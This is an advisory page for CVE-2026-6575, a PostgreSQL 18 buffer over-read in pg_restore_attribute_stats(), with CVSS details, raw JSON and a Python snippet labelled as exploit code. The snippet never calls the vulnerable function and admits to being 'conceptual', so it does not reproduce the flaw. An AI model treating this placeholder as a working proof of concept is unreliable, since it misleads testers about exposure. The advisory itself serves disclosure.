Security Vulnerability Report
CVE-2026-6575 CVSS 4.3 MEDIUM

CVE-2026-6575

Published: 2026-05-14 14:16:26
Last Modified: 2026-05-14 16:21:23
Source: f86ef6dc-4d3a-42ad-8f28-e6d5547a5007

Description

Buffer over-read in PostgreSQL function pg_restore_attribute_stats() accepts array values of unmatched length, which causes query planning to read past end of one array. This allows a table maintainer to infer memory values past that array end. Within major version 18, minor versions before PostgreSQL 18.4 are affected. Versions before PostgreSQL 18 are unaffected.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PostgreSQL 18 < 18.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import psycopg2

# Connect to the vulnerable PostgreSQL instance
conn = psycopg2.connect(
    dbname="testdb",
    user="maintainer_user",  # Requires table maintenance privileges
    password="password",
    host="127.0.0.1"
)
conn.autocommit = True
cursor = conn.cursor()

try:
    # Attempt to trigger the vulnerability by manipulating stats
    # Note: This is a conceptual PoC. Real exploitation requires specific
    # internal stat manipulation to trigger pg_restore_attribute_stats()
    # with mismatched array lengths during planning.

    # Create a test table and gather stats
    cursor.execute("CREATE TABLE IF NOT EXISTS vuln_test (id INT, data TEXT);")
    cursor.execute("ANALYZE vuln_test;")

    # Execute a query that forces the planner to read stats
    # Potentially triggering the over-read if stats are corrupted
    cursor.execute("SELECT * FROM vuln_test WHERE id = 1;")
    print("Query executed. Check memory logs for potential over-read indicators.")
except Exception as e:
    print(f"Error: {e}")

cursor.close()
conn.close()
```

References

https://www.postgresql.org/support/security/CVE-2026-6575/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6575", "sourceIdentifier": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "published": "2026-05-14T14:16:25.693", "lastModified": "2026-05-14T16:21:23.190", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Buffer over-read in PostgreSQL function pg_restore_attribute_stats() accepts array values of unmatched length, which causes query planning to read past end of one array. This allows a table maintainer to infer memory values past that array end. Within major version 18, minor versions before PostgreSQL 18.4 are affected. Versions before PostgreSQL 18 are unaffected."}], "metrics": {"cvssMetricV31": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}], "references": [{"url": "https://www.postgresql.org/support/security/CVE-2026-6575/", "source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007"}]}}